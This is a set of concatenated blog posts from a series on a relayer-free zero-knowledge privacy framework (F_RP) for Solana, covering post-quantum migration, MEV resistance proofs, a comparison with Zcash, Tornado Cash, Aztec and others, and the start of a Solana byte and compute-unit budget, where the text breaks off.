| Off-chain STARK + on-chain hash | 32 B hash | ~10K | Yes^* | Yes |

`^*` Requires off-chain proof availability + honest-verifier assumption for retrieval.

## Isogeny-based group actions for credentials

For applications needing **anonymous identity binding** — compliance-compatible privacy, selective disclosure, "prove balance ≥ threshold without revealing balance" — isogeny-based cryptography offers post-quantum group actions that can replace DLOG-based constructions.

### CSIDH-based ring signatures

CSIDH defines a commutative group action `★: Cl(O) × E(F_p) → E(F_p)` between the ideal class group of an imaginary quadratic order and the set of supersingular elliptic curves over `F_p`. This group action instantiates Sigma protocols for "knowledge of an isogeny", which yields ring signatures via Fiat-Shamir.

**Current status (cautious):** CSIDH at NIST-1 security needs `p ≈ 2^512`, key sizes ~64 B, computation ~50-100 ms. **Quantum security analysis (Bonnetain-Schrottenloher, Peikert) shows Kuperberg's quantum sub-exponential algorithm threatens CSIDH more aggressively than classical attacks** — proposed 128-bit classical / 64-bit quantum parameters can be broken in `~2^35` quantum key-exchange evaluations, not `~2^62`.

So CSIDH at the 128-bit level is **not** secure at the originally advertised parameters. Larger parameters (`p ≈ 2^4096+`) restore the security but balloon costs.

### SQIsign

**SQIsign** (De Feo, Kohel, Leroux, Petit, Wesolowski — NIST Round 2) offers compact post-quantum signatures (**204 bytes**) from quaternion isogeny problems. Signing time ~100 ms.

Verification is computationally expensive (~100 ms), which makes it impractical for direct on-chain verification on Solana — a single SQIsign verification would consume the entire 1.4M CU budget.

### Open problem 7.3 — isogeny anonymous credentials

Design an anonymous credential scheme based on supersingular isogeny group actions that:

1. Supports selective attribute disclosure.
2. Has verification time < 10 ms (compatible with blockchain block times).
3. Achieves 128-bit post-quantum security with concrete parameter justification.
4. Is compatible with the SPST note model (credentials bound to note commitments).

This is wide open. The most promising shape is a **hybrid architecture**: isogeny-based credentials for identity binding, composed with STARK proofs for the transactional privacy layer.

## What survives without modification

Two pieces of F_RP carry over unchanged into the post-quantum world:

1. **Poseidon Merkle trees.** Hash-based, no algebraic structure assumption beyond collision resistance.
2. **Indexed Merkle Trees** for nullifier non-membership. Same hashes, same structure, same constraints.

So the *state* layer of F_RP doesn't need to change. Only the *proof* and *signature* layers.

## Migration timeline (rough)

| Year | Milestone |
|------|-----------|
| 2026-2028 | F_RP v1: Groth16 + BN254 + Ed25519. Production deployment. |
| 2028-2030 | NIST PQC standardisation completes. ML-DSA / SLH-DSA / Falcon shipped. |
| 2030-2032 | Solana adds PQ syscalls (NIST-recommended). F_RP v2 design starts. |
| 2032-2035 | F_RP v2 ships: hybrid pre-quantum + post-quantum proofs. Both verify. |
| 2035-2040 | F_RP v3: pure post-quantum. Pre-quantum support deprecated. |

This timeline is contingent on (a) NIST shipping PQC standards on schedule, (b) Solana adopting the syscalls within ~2 years of standardisation, and (c) lattice-based polynomial commitments achieving sub-10 KB proof sizes. None of these are certain. All three look likely.

## What would have to change in F_RP itself

The protocol design is mostly insulated. Specifically:

1. **The note model is unchanged.** Notes, commitments, nullifiers, Merkle trees — all hash-based.
2. **The five-tuple `(Setup, Deploy, Invoke, Verify, Finalize)` is unchanged.** Just the proof system inside `Invoke`/`Verify` swaps out.
3. **The simulation-based privacy theorem (3.12) survives.** The hybrid argument's transitions are: ZK of proof system, pseudorandomness of hash, pseudorandomness of PRF, CCA2 of encryption. The ZK / PRF / CCA2 each get a post-quantum-secure replacement; the structure of the proof is the same.
4. **The self-sovereignty theorem (3.13) survives unchanged.** It only depends on chain liveness and proof system completeness.

What changes: byte sizes, CU costs, prover times. The math survives. That's a lucky property of having designed F_RP around the abstract `Π_hybrid` rather than committing to Groth16 in the relations.

## Why this isn't urgent (today)

It's worth ending the series with the honest answer to "should I be worried right now?":

No. Not in 2026, not in 2028. A cryptographically-relevant quantum computer is plausibly a decade-plus away. The harvest-now-decrypt-later threat applies to confidentiality (encrypted communications today, decrypted later when QC arrives) — but most F_RP outputs are *commitments and nullifiers*, not encrypted plaintexts. The information-theoretic content of an old shielded transaction is bounded; an adversary who breaks it in 2040 learns transaction graph structure that's no longer interesting.

What does need attention: **building the migration path now** so that when the day comes, F_RP isn't a 2-year rewrite project. That's what this post is for.

## Closing the series

Eleven posts:

1. [Series intro](/blog/relayerless_privacy_intro/) — the F_RP framework and the five games.
2. [The fee paradox](/blog/the_fee_paradox/) — why every smart-contract privacy protocol needs a relayer.
3. [SPST](/blog/spst_self_paying_shielded_transactions/) — self-paying shielded transactions, four security theorems.
4. [PPST](/blog/ppst_private_programmable_state/) — private programmable state via R1CS embedding.
5. [TAB](/blog/tab_threshold_anonymous_broadcast/) — submitter anonymity via ring sigs and FROST.
6. [Verifiable shuffles](/blog/verifiable_shuffles_for_privacy/) — Bayer-Groth network-layer mixing.
7. [UPEE](/blog/upee_universal_private_execution/) — composing the framework, the simulation-based privacy and self-sovereignty theorems.
8. [Solana instantiation](/blog/solana_instantiation_656_bytes/) — concrete numbers: 656 bytes, 235K CU.
9. [F_RP vs the rest](/blog/f_rp_vs_existing_privacy_systems/) — comparison with nine deployed privacy systems.
10. [MEV resistance](/blog/mev_resistance_in_private_execution/) — sandwich-proof by construction; Theorem 7.4.
11. [Post-quantum migration](/blog/post_quantum_relayerless_path/) — the future-proofing plan you just read.

The full preprint will land at `/papers/relayerless-privacy/` once typeset. Until then the series is the canonical reference. If you want to discuss any of it, [book a call](https://cal.com/daxts) or open an issue on `Dax911/zera-sdk`.

Thanks for reading.

## Bibliography

- Shor, P. W. (1997). *Polynomial-Time Algorithms for Prime Factorization and Discrete Logarithms on a Quantum Computer.* SIAM Journal on Computing.
- Golovnev, A., Lee, J., Setty, S., Thaler, J., Wahby, R. (2023). *Brakedown.* CRYPTO 2023.
- Xie, T., Zhang, Y., Song, D. (2022). *Orion.* CRYPTO 2022.
- Ben-Sasson, E. et al. (2018). *STARKs.* https://eprint.iacr.org/2018/046
- De Feo, L., Kohel, D., Leroux, A., Petit, C., Wesolowski, B. (2020). *SQIsign.* ASIACRYPT 2020. https://eprint.iacr.org/2020/1240
- Castryck, W. et al. (2018). *CSIDH.* ASIACRYPT 2018. https://eprint.iacr.org/2018/383
- Bonnetain, X., Schrottenloher, A. (2018). *Quantum Security Analysis of CSIDH.*
- Peikert, C. (2020). *He gives C-sieves on the CSIDH.*
- NIST PQC Round 4 — *Post-Quantum Cryptography Standardization.*

Previous: [MEV resistance ←](/blog/mev_resistance_in_private_execution/) · Series: [back to start](/blog/relayerless_privacy_intro/)


---

# MEV resistance: why UPEE is sandwich-proof by construction

Canonical: https://blog.skill-issue.dev/blog/mev_resistance_in_private_execution/
Description: Theorem 7.3 — UPEE transactions resist sandwich/frontrun/liquidation MEV by construction. Theorem 7.4 — block MEV bounded by public-bit leakage, not transaction value. Independent of V, not super-linear.
Published: 2026-05-14T15:00:00.000Z
Tags: zk, mev, flashbots, mempool, privacy, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

MEV is the second-order tax on public DeFi. Searchers monitor the mempool, see your swap before it confirms, and front-run / back-run / sandwich it for profit. On Ethereum L1 in 2024-2025, MEV extracted from retail users approached **\$700M/year** — straight value transfer from end users to searchers and validators.

UPEE eliminates the dominant classes of MEV by construction. This post derives why, and quantifies what's left.

This is post 10 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series.

<Aside kind="note">
The MEV-resistance argument is a side effect of simulation-based privacy (Theorem 3.12). If the adversary can't see the transaction's contents, they can't extract value from those contents. The interesting question is what *is* visible — and that's the residual MEV bound.
</Aside>

## What MEV is, formally

**Definition.** Let `B = (tx_1, ..., tx_n)` be a block of transactions, `σ_0` the pre-block state. The MEV of block `B` relative to validator `V` is:

$$
\mathrm{MEV}(B, V) \;=\; \max_{\pi \in S_n,\ \mathsf{tx}_{\mathrm{ins}}} \Bigl[\,\mathrm{profit}_V(\sigma_0, \pi(B) \cup \mathsf{tx}_{\mathrm{ins}}) - \mathrm{profit}_V(\sigma_0, B)\,\Bigr].
$$

The maximum is over (a) all permutations `π` of the transaction ordering and (b) all sets `tx_ins` of transactions the validator may insert. `profit_V` is the validator's balance change after executing the reordered/augmented block.

Concretely, the four dominant MEV categories:

| Category | What the adversary needs | Public DeFi cost |
|----------|--------------------------|-----|
| **Sandwich** | Trade direction + size | $(V^2 / L)$ for a $V$-sized swap, $L$ pool liquidity |
| **Frontrunning** | Transaction content | Up to full tx value |
| **Backrunning** | Observable state change | Bounded by arbitrage opportunity |
| **Liquidation** | Position state | Liquidator's bonus % |

## Theorem 7.3 — MEV resistance of private transactions

**Statement.** Let `tx` be a private UPEE transaction. For any PPT adversary `A` (including a colluding validator):

$$
\Pr[\mathrm{MEV}_A(\mathsf{tx}) > 0] \;\leq\; \mathsf{negl}(\lambda)
$$

for sandwich attacks, frontrunning, and liquidation MEV. **Backrunning** is bounded separately by public-output leakage.

### Proof of sandwich resistance

A sandwich attack requires the adversary to determine the trade direction (buy or sell) and approximate size of the victim's swap. In UPEE, the transaction content — including the program being invoked, the private inputs, and the state transition — is hidden by the ZK proof.

By Theorem 3.12 (simulation-based privacy), there exists a simulator `S` that produces a computationally indistinguishable view using only the public outputs `({nf_i}, {cm_j}, f, program_id)`. `S` does not receive the trade direction or size:

$$
\bigl|\,\Pr[\mathcal{A}(\mathsf{View}_{\mathrm{Real}}) = \mathrm{direction}] - \tfrac{1}{2}\,\bigr| \;\leq\; \mathsf{negl}(\lambda).
$$

Without the direction, a sandwich attack is a coin flip — expected profit zero (the adversary is equally likely to lose as to gain).

### Proof of frontrunning resistance

Frontrunning requires the adversary to know what the transaction will do *before* it confirms. In UPEE the transaction content is encrypted within the ZK proof; the adversary sees only the public tuple, which is simulatable without the witness. The adversary has no advantage in predicting the transaction's effect on state, so frontrunning degenerates to random speculation. ∎

### Proof of liquidation resistance

Liquidation MEV requires knowing that a specific position has become undercollateralised. In UPEE, position state lives in the private state tree as committed values. The adversary can see *that* a position exists (via its commitment) but not whether it is liquidatable — that requires opening the commitment, which the ZK proof guarantees they cannot do. ∎

### The backrunning caveat

Backrunning exploits **observable state changes after the fact**. Even with UPEE, some public state changes leak: a private DEX swap might cause an observable change in a public AMM's price oracle, and that's a backrunnable event. The leakage is bounded by the number of bits of public state affected by the transaction.

This is the point of Theorem 7.4.

## Theorem 7.4 — MEV revenue bound

**Statement.** For a block containing `n` private UPEE transactions, the expected MEV revenue for a validator is bounded by:

$$
\mathbb{E}[\mathrm{MEV}] \;\leq\; n \cdot f_{\max} \;+\; \ell_{\mathrm{bits}} \cdot v_{\mathrm{bit}}
$$

where:

- `f_max = max_i f_i` is the maximum public fee — validators trivially "extract" fees, but those are legitimate compensation for inclusion.
- `ℓ_bits = sum |public outputs of tx_i|` is total information leakage in bits across the n transactions.
- `v_bit` is the maximum economic value per bit of leaked information (application-dependent).

**Proof.** Each private transaction contributes at most `f_i ≤ f_max` in direct revenue. Additional MEV requires exploiting information beyond the fee. By Theorem 7.3, the only exploitable info is from public outputs. Each bit of public output conveys at most one bit about private state. The economic value extractable per bit is bounded by the application's value density — for a DEX trade of value `V`, one bit of direction info yields expected profit `O(√V)` due to the square-root law of market impact. Sum over bits and transactions. ∎

## The qualitative shift

For public DeFi, MEV from a swap of value `V` scales as **`O(V^2 / L)`** for sandwich attacks (super-linear in `V`).

For UPEE, MEV is bounded by **public-bit leakage × per-bit value**, which is **independent of `V`**.

That's the shift. MEV no longer scales with transaction value. A user moving \$10M through UPEE is not 10× more valuable to an MEV searcher than a user moving \$1M — both leak the same number of public bits.

| Model | Sandwich MEV scaling | Frontrun scaling |
|-------|----------------------|------------------|
| Public DeFi (Uniswap on ETH) | $O(V^2 / L)$ | $O(V)$ |
| UPEE | $O(\ell_{\mathrm{bits}})$ — independent of V | 0 |

## Public outputs of a UPEE transaction

Concretely, the public bits leaked per transaction:

| Output | Bits | Information content |
|--------|------|---------------------|
| Nullifiers | 256 × n_in | Pseudorandom from the adversary's view (PRF security) |
| Commitments | 256 × n_out | Pseudorandom from the adversary's view (Poseidon hiding) |
| Merkle root | 256 | Public state, doesn't carry tx-specific info |
| Fee | 64 | Reveals fee tier, ~10 bits effective entropy |
| program_id | 256 | Identifies *which* program; partial function privacy leak |

Pseudorandom outputs by definition leak nothing about the underlying state. The MEV-relevant leak is the **fee tier** (~10 bits) and the **program_id** (which program executed). For a DEX program, the program_id reveals that *some* swap happened in *that* DEX — but not the direction, size, or counterparty.

## What about backrunning a private DEX?

A private swap might still cause an observable state change in the DEX's *public* price oracle. In that case the backrunner observes:

- A nullifier was consumed (the swap happened).
- The price oracle moved by some amount Δp.

Δp encodes the trade size. The backrunner can arbitrage based on Δp without knowing who swapped or in which direction.

**Mitigation.** Use a batch-auction DEX (Penumbra's ZSwap is the reference design): aggregate all swaps in a block into a single batch with a uniform clearing price. The price oracle moves once per block, not per trade. Individual trade direction and size remain hidden; only the *net* batch flow is visible.

This is on the F_RP roadmap as a separate construction (Private Batch Auction, PBA).

## What stays public no matter what

Three things UPEE can't hide while still letting validators do their job:

1. **The fee `f`.** Validators need to know `f` to prioritise inclusion. This is a 64-bit public input.
2. **The fact a transaction occurred.** The validator inserts the nullifier and commitment, both public.
3. **Block timing.** Block-level patterns (transactions per block, time-of-day) leak metadata about overall protocol usage.

The first two are inherent to any chain with fees and global state. The third is mitigated by batch-auction DEX design and by encouraging client-side delay sampling on the user side.

## Comparison with Flashbots, MEV-Share, encrypted mempools

The Ethereum ecosystem has been working on MEV mitigation for years:

| Approach | Mechanism | What's hidden | What still leaks |
|----------|-----------|---------------|------------------|
| **Flashbots private mempool** | Direct submission to builder | Tx contents pre-confirmation | Builder sees + can extract MEV |
| **MEV-Share** | Selective metadata disclosure | User chooses | What user discloses |
| **Shutter Network** | Threshold-encrypted mempool | Tx until block sealed | Tx after seal |
| **EIP-8105 enshrined encrypted mempool** | Protocol-level encryption | Tx during ordering | Some patterns |
| **UPEE (this work)** | ZK-encrypted execution | All inputs/outputs | Fee + program_id + state-change side-effects |

The Ethereum approaches are all about *delay* — hide the tx until the moment it's executed, accepting the leak after that. UPEE is structurally different: the tx is *never* visible in plaintext. Even after execution, the inputs and intermediate state remain encrypted.

## Why this matters for retail

The user-facing implication: a retail user on UPEE doesn't pay an MEV tax that scales with their trade size. They pay their explicit fee `f` and a small bounded leakage cost. For a \$1M trade on UPEE, MEV cost is bounded by the same `ℓ_bits · v_bit` term as a \$1k trade.

That's the point of building this on a smart-contract chain. Public DeFi is great for liquidity but hostile to retail. Private execution restores the property that "I trade because I want to trade", not "I trade and pay an invisible 30-50bps tax to the searchers between me and the AMM".

## Open problem 7.5 — tightness

The bound in Theorem 7.4 is an upper bound. Is it tight? Specifically: construct an adversary that achieves MEV revenue within a constant factor of `ℓ_bits · v_bit`, or prove the bound can be tightened by structural analysis of SPST/UPEE.

This is open. My intuition is the bound is loose — most public outputs are pseudorandom and don't carry economic value. But proving it requires careful analysis of the per-application leakage channels, which depends on the application.

## Bibliography

- Daian, P., Goldfeder, S., Kell, T. et al. (2019). *Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges.* IEEE S&P 2020.
- Flashbots Collective. *MEV-Share: programmably private orderflow.*
- Shutter Network. *EIP-8105: Universal Enshrined Encrypted Mempool.*
- Penumbra Labs. *ZSwap: shielded sealed-bid batch auctions.*
- ESMA (2025). *Maximal Extractable Value: Implications for Crypto Markets.* European Securities and Markets Authority.

Previous: [F_RP vs the rest ←](/blog/f_rp_vs_existing_privacy_systems/) · Next: [The post-quantum migration path →](/blog/post_quantum_relayerless_path/)


---

# F_RP vs Zcash, Tornado, RAILGUN, Aztec, Penumbra, Aleo, Namada, Monero

Canonical: https://blog.skill-issue.dev/blog/f_rp_vs_existing_privacy_systems/
Description: F_RP vs nine deployed privacy systems on the four axes that matter: relayer-free, Turing-complete, on-chain verifiable on a high-perf L1, low-trust setup.
Published: 2026-05-12T15:00:00.000Z
Tags: zk, comparison, zcash, tornado, aztec, monero, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

I've now spelled out the full F_RP framework. Two natural next questions:

1. Has someone built this already?
2. If not, what's the closest existing thing and why doesn't it cover the same ground?

This post answers both. We compare F_RP against nine deployed privacy systems on twelve axes. The TL;DR: **no existing system simultaneously achieves relayer-free operation, Turing-complete computation privacy, and on-chain-verifiable proofs on a general-purpose Layer-1 blockchain.** That's the gap F_RP fills.

This is post 9 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series.

## The matrix

| Property | F_RP (ours) | Zcash Orchard | Tornado Cash | RAILGUN | Aztec | Penumbra | Aleo | Namada | Monero |
|---|---|---|---|---|---|---|---|---|---|
| **Relayer required** | **No** | No | **Yes** | **Yes** | No (sequencer) | No | No | No | No |
| **Proof system** | Groth16 (BN254) + Nova | Halo 2 (IPA) | Groth16 (BN254) | Groth16 (BN254) | Honk (UltraPLONK) | Groth16 (BLS12-377) | Varuna (Marlin) | Groth16 (BLS12-381) | CLSAG + Bulletproofs+ |
| **Proof size** | 128 B compressed | 2,720 + 2,272·n B | 128 B | 128 B/circuit | ~400-800 B | ~192 B | Compact (KZG) | ~192 B | O(ring_size) + log(n) |
| **Verification cost** | ≈150K CU on Solana | ~10ms CPU | ~200K gas (ETH) | 600K-1M gas | Off-chain L2 batch | Native (L1) | Native (L1) | Native (L1) | O(ring_size) EC |
| **Trusted setup** | Per-circuit MPC | **None** | Per-circuit MPC | Per-circuit MPC | Universal KZG | Per-circuit MPC | Universal KZG | Per-circuit MPC | **None** |
| **Post-quantum** | No (STARK migration path) | No (DLOG) | No | No | No | No | No | No | No (DLOG) |
| **Anonymity set** | Global shielded pool (2^32) | All Orchard notes | Per-denomination (2^20) | All shielded UTXOs | All encrypted notes | Multi-asset unified pool | All records | Multi-asset MASP | Ring 16 (FCMP++ pending) |
| **Programmability** | **Full (PPST)** | None | None | Limited DeFi | **Full (Noir)** | Limited (DEX/staking) | **Full (Leo)** | Limited (Convert) | None |
| **Fee mechanism** | **Self-paying from pool** | Self-paying via valueBalance | **Relayer pays gas** | **Broadcaster pays gas** | Client-side ZK fee proof | Public fee from balance | Private fee proof | Convert circuit | Public miner fee |
| **Self-sovereignty** | **Full (Theorem 3.13)** | Full | **Partial (relayer)** | **Partial (Broadcaster)** | Full (PXE-side) | Full | Full | Full | Full |
| **Target chain** | **Solana** (smart-contract layer) | Zcash L1 | Ethereum (EVM) | EVM L1s | Ethereum L2 rollup | Cosmos L1 | Aleo L1 | Namada L1 | Monero L1 (PoW) |
| **Program privacy** | **Full** (program inputs/outputs hidden) | N/A | N/A | N/A | Partial (public calls visible) | N/A | Partial (program ID visible) | N/A | N/A |

## Three things F_RP gets that nobody else gets simultaneously

### 1. Relayer-free on a smart-contract chain

Zcash, Penumbra, Monero, and Aleo are all relayer-free, but they're each their **own L1 chain**. Their consensus, validators, and fee mechanism are bespoke. They get relayer-freedom by being a chain, not by solving the smart-contract-layer problem.

Aztec is relayer-free on a smart-contract platform — but it's an **L2 rollup with its own sequencer**. The sequencer is the de facto relayer with extra steps; if it goes offline, the L2 stalls. Aztec's deployment model isn't applicable to Solana.

F_RP runs as a **smart-contract program on Solana mainnet**. Same validators that run Jupiter and Helium. No new chain, no new sequencer, no relayer. The only assumption is Solana's chain liveness — which is what every Solana program already assumes.

### 2. Turing-complete program privacy

Tornado Cash and RAILGUN provide value transfer only. No conditional logic, no AMM, no auctions — just shielded ERC-20 transfers (or fixed-denomination ETH). Adding programmability would require redesigning the protocol from the ground up.

Aztec and Aleo do offer programmability. Aztec ships Noir, Aleo ships Leo. Both work, both are L1-or-L2 specific.

F_RP's PPST construction puts arbitrary arithmetic circuits inside the proof on a chain that wasn't built for them. The R1CS for the user's program is embedded as a sub-circuit of the outer PPST relation. The Solana on-chain verifier doesn't care what the program is — it just verifies the wrapping Groth16 proof.

### 3. On-chain verification on a high-throughput L1

Solana's `alt_bn128` syscalls verify Groth16 in ~150K CU (~$0.02 USD at typical priority fees). Block time ~600ms. Theoretical TPS in the tens of thousands.

| Chain | Groth16 verification cost | Block time |
|-------|---------------------------|-----------|
| Ethereum L1 | ~200K gas (~$5-12 USD) | 12 s |
| Solana L1 | ~150K CU (~$0.02 USD) | 0.6 s |
| Zcash L1 | Native (no gas model) | 75 s |

The cost difference is ~250× and the latency difference is ~20×. For a privacy protocol that wants to compose with public DeFi (private swap → public AMM → private settlement), Solana's economics are the only ones that work for retail users.

## Where F_RP loses to existing systems

Honest comparison cuts both ways. Three places F_RP loses:

### To Zcash Orchard: trusted setup

Zcash Orchard uses **Halo 2 with IPA** over Pasta curves — fully transparent, no per-circuit ceremony. F_RP's primary instantiation uses Groth16 with a per-circuit MPC ceremony.

The migration path is the hybrid proof architecture (Theorem 3.8): inner STARK or Nova folding (transparent), outer Groth16 wrapper. Once SIMD-0302 ships on Solana (BN254 G2 syscall), we can switch the outer to PLONK with universal SRS — eliminating per-circuit ceremonies. Until then, Groth16 is the price of admission for cheap on-chain verification.

### To Monero: simplicity of the threat model

Monero's privacy story fits in three sentences: ring signatures hide the sender, stealth addresses hide the receiver, RingCT hides the amount. No L2, no relayers, no shielded pool, no programmability. That simplicity is a *feature* — Monero has been deployed and battle-tested since 2014.

F_RP is more complex because it does more. Programmability is genuinely harder than value transfer. The pricing of that complexity is on the user; the gain is composability with the rest of the Solana ecosystem.

### To Aztec: native privacy DSL

Aztec ships **Noir**, a Rust-like DSL purpose-built for ZK circuits. Compiles to ACIR, plugs into Honk / Barretenberg with first-class Aztec idioms (private functions, public functions, schedule-cross-boundary calls).

F_RP currently relies on Circom or Noir for circuit authoring, with the developer responsible for wiring the program into the PPST relation. There's no "F_RP DSL" yet. That's a tooling gap, not a protocol gap — Noir-to-PPST adapters are an obvious next step.

## What F_RP and Zcash agree on

A pleasant surprise: F_RP's SPST construction and Zcash's Sapling spend description are mathematically isomorphic. Same note/commitment/nullifier model, same value-balance equation, same Pedersen value commitments.

The differences are deployment:
- Zcash runs on its own L1 with native fee handling.
- F_RP runs on Solana with the fee extracted from a program PDA reserve.

The cryptography is the same. F_RP is, in some sense, "Zcash's Sapling pool, ported to Solana, extended with PPST for programs and TAB for submitter anonymity, with fees handled by an in-program reserve."

<Quote attribution="Daira Hopwood, paraphrased from many Zcash protocol discussions">
The hard part is the protocol design. The cryptography is just engineering.
</Quote>

## What F_RP and Aleo agree on

Aleo's records model (from ZEXE) and F_RP's PPST share the core insight: **a private program is an arithmetic circuit, and the proof attests to correct execution over committed state**. Both use a notion of records / notes that get nullified on consumption.

The difference is again deployment:
- Aleo runs on its own L1 with a native delegated-prover marketplace.
- F_RP runs on Solana with prover delegation as a separate off-chain market.

And one big disagreement: Aleo has elected **not** to implement function privacy — the program ID is visible on-chain. F_RP makes the same trade-off in v1 but flags universal-circuit-based function privacy as a future extension.

## The 2x2x2 decision lattice

Here's the same data as a decision tree:

<Mermaid id="frp-decision-tree" code={`graph TD
  Q1{Need on-chain<br/>smart contracts?}
  Q1 -->|No| Q2{Want<br/>programmability?}
  Q1 -->|Yes| Q3{Need it<br/>relayer-free?}
  Q2 -->|No| Z[Zcash / Monero]
  Q2 -->|Yes| A[Aleo / Penumbra]
  Q3 -->|No| T[Tornado / RAILGUN<br/>relayer-dependent]
  Q3 -->|Yes| Q4{Layer 1 or 2?}
  Q4 -->|L2| AZ[Aztec]
  Q4 -->|L1| F[F_RP]
  classDef leaf stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  classDef us stroke:#facc15,stroke-width:3px,fill:#0a0a0a,color:#fff
  class Z,A,T,AZ leaf
  class F us
`}/>

The branch where F_RP lives — "yes I want a smart-contract chain, yes I want relayer-free, yes I want L1, with cheap on-chain verification" — is the cell that was empty until now.

## Bibliography

- Hopwood, D., Bowe, S., Hornby, T., Wilcox, N. *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Pertsev, A., Semenov, R., Storm, R. *Tornado Cash Privacy Solution v1.4.*
- RAILGUN Documentation. *Privacy System Architecture.*
- Aztec Network. *Client-side Proof Generation.* https://aztec.network/blog/client-side-proof-generation
- Penumbra Labs. *Penumbra Protocol Documentation.* https://protocol.penumbra.zone/main/index.html
- Bowe, S., Chiesa, A., Green, M., Miers, I., Mishra, P., Wu, H. (2020). *ZEXE.* IEEE S&P 2020.
- Namada Network. *Multi-Asset Shielded Pool.* https://github.com/namada-net/masp
- Noether, S., Mackenzie, A. (2016). *Ring Confidential Transactions.* MRL-0005.

Previous: [Solana instantiation ←](/blog/solana_instantiation_656_bytes/) · Next: [MEV resistance →](/blog/mev_resistance_in_private_execution/)


---

# Fitting F_RP in 656 bytes on Solana

Canonical: https://blog.skill-issue.dev/blog/solana_instantiation_656_bytes/
Description: Concrete F_RP instantiation on Solana. Groth16 over BN254, Poseidon Merkle, indexed nullifier tree, BN254 Pedersen, transaction in 656 of 1,232 bytes, 235K of 1.4M CU.
Published: 2026-05-10T15:00:00.000Z
Tags: zk, solana, bn254, alt_bn128, engineering, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The previous six posts derived F_RP at the level of relations and theorems. This post is the engineering side: every byte and every compute unit.

The headline numbers:

| Resource | Used by F_RP | Solana hard cap | Headroom |
|----------|-------------|----------------|----------|
| Transaction bytes | **656** | 1,232 (legacy) / 4,096 (SIMD-0296) | 576 / 3,440 |
| Compute units | **~235,000** | 1,400,000 | 1,165,000 |
| On-chain Groth16 verify | **~150,000** | (subset of CU above) | — |
| Proof size (compressed) | **128** | (subset of bytes above) | — |

This is post 8 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series.

<Aside kind="note">
None of the numbers below are speculative. Groth16-on-Solana has been live on mainnet since v1.16 (alt_bn128 syscalls). Light Protocol's [`groth16-solana`](https://github.com/Lightprotocol/groth16-solana) verifier is the production reference. Numbers come from Helius's [ZK applications report](https://www.helius.dev/blog/zero-knowledge-proofs-its-applications-on-solana) and Light's own benchmarks.
</Aside>

## Proof system: Groth16 over BN254

**Why Groth16, not PLONK or STARK.** Three reasons:

1. **128-byte compressed proof.** Smallest known SNARK output. Critical for Solana's 1,232-byte transaction envelope.
2. **`< 200,000 CU` verification on-chain.** The `sol_alt_bn128_group_op` and `sol_alt_bn128_pairing` syscalls (live since v1.16) make BN254 ops native to the validator runtime.
3. **Existing infrastructure.** Light Protocol's groth16-solana is already deployed; ZK Compression on mainnet uses it.

PLONK is plausible once SIMD-0302 (BN254 G2 arithmetic syscall, in Review as of Q1 2026) activates — but as of writing, full G2 scalar multiplication is not a syscall, so KZG-based PLONK verification is impractical.

STARKs are too big: a single STARK proof is ~50–200 KB, way over the transaction limit. Hybrid wrapping (STARK inner, Groth16 outer) gives the best of both — Theorem 3.8.

| Parameter | Value |
|-----------|-------|
| Curve | BN254 (alt_bn128) |
| Proof structure | π = (A ∈ 𝔾_1, B ∈ 𝔾_2, C ∈ 𝔾_1) |
| Uncompressed size | 256 bytes (64 + 128 + 64) |
| Compressed via `sol_alt_bn128_compression` | **128 bytes** |
| Security level | ~128 bits (Barbulescu-Duquesne 2019 conservative estimate) |
| Trusted setup | Per-circuit MPC (Powers-of-Tau) |

## Hash function: Poseidon over BN254 scalar field

Poseidon is the standard SNARK-friendly hash for BN254 circuits. Solana ships it as a native syscall (`sol_poseidon`).

| Parameter | Value |
|-----------|-------|
| Field | `𝔽_p` where p = BN254 scalar field order |
| State width | t = 3 (binary tree: 2 inputs → 1 output) |
| S-box exponent | α = 5 (gcd(5, p-1) = 1 holds) |
| Full rounds | R_F = 8 |
| Partial rounds | R_P = 57 |
| R1CS constraints per hash | 8·3·4 + 57·4 = 96 + 228 = **324** |
| Native syscall | `sol_poseidon` (mainnet, v1.16+) |

This is what Light Protocol's compressed-account commitments use. Same hash everywhere keeps the compressed-account ↔ F_RP boundary clean.

## Merkle trees

Two trees, both Poseidon-based:

### Note commitment tree (depth 32)

| Parameter | Value |
|-----------|-------|
| Depth | d = 32 |
| Capacity | 2^32 ≈ 4.3 × 10^9 notes |
| On-chain state | 32-byte root in PDA |
| Off-chain state | Light Protocol ZK Compression (Solana ledger call data) |
| Membership-proof circuit cost | 32 · 324 ≈ 10,400 R1CS constraints |

### Nullifier tree (Indexed Merkle, depth 32)

The nullifier set needs efficient *non-membership* checks. Sparse Merkle Trees over 254-bit hashes would cost 254 · 324 ≈ 82,300 constraints per non-membership proof. Indexed Merkle Trees (Aztec's construction) drop this to depth 32:

$$
C_{\mathsf{IMT-nonmem}} \;=\; 32 \cdot 324 + 324 + 256 \;\approx\; 10{,}948 \text{ R1CS constraints.}
$$

A **7.5× reduction** at the cost of maintaining a sorted linked list off-chain.

Aztec's design proves the "low nullifier" — the leaf where the new nullifier would slot in — and asserts the new value is in the gap. Two range checks plus a standard Merkle path.

## Pedersen commitments over BN254 𝔾_1

Used for value hiding inside SPST + range-proof aggregation.

| Parameter | Value |
|-----------|-------|
| Group | BN254 𝔾_1 (prime order p ≈ 2^254) |
| Generators | G, H ∈ 𝔾_1 with unknown DL relation |
| Commitment | C = v · G + r · H |
| Value range | v ∈ [0, 2^64) |
| Range proof | In-circuit bit decomposition: 128 R1CS constraints / 64-bit value |
| Homomorphism | C_1 + C_2 = Com(v_1 + v_2, r_1 + r_2) |

**Why BN254 𝔾_1, not Curve25519?** Solana's native Twisted ElGamal commitments live on Ristretto255 / Curve25519. We don't reuse them for two reasons:

1. **Curve mismatch.** Groth16 needs pairing-friendly BN254. Solana's Ed25519 / Curve25519 is not pairing-friendly. Mixing the two would require expensive cross-curve gadgets.
2. **Different threat model.** Token-2022 confidential transfers hide *amounts*. F_RP needs to hide *amounts + senders + receivers + program logic*. The two are different protocols on different math; clean separation is correct.

## Key derivation

The privacy framework uses its own key hierarchy, independent of the user's Solana Ed25519 keypair:

| Key | Derivation | Purpose |
|-----|-----------|---------|
